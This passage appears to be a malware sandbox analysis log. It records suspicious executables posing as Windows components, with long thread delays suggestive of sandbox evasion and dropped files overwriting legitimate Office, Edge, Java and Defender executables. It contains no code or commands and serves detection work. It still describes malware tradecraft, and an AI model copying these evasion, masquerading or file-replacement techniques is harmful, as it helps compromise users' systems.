Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Memory allocated: 1B1F0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Memory allocated: 1B060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 26C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Memory allocated: 1A8E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1440	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1213
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1234
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1254
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1201
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1949
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Window / User API: threadDelayed 6523
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Window / User API: threadDelayed 2063

Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LabWdNFO.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uWHiFCKf.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rOKZjkQk.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QWQVqwoz.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DiJGaagK.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YAYKaqDh.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\csYLXLvO.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kpEaCKQF.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TYnVXEze.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yVVZwldW.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sRLquvOw.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WqYmKtXd.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CaAofPGe.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IniXRspB.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YUdUknhP.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oJaATZbJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BAeGeXTe.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jzkKkMJA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zysYIoOi.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lSjJLcbQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\anplGAHn.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZCiUQOvV.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QNsVGKUC.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SPfDctZy.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VMrdIRuc.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	Jump to dropped file
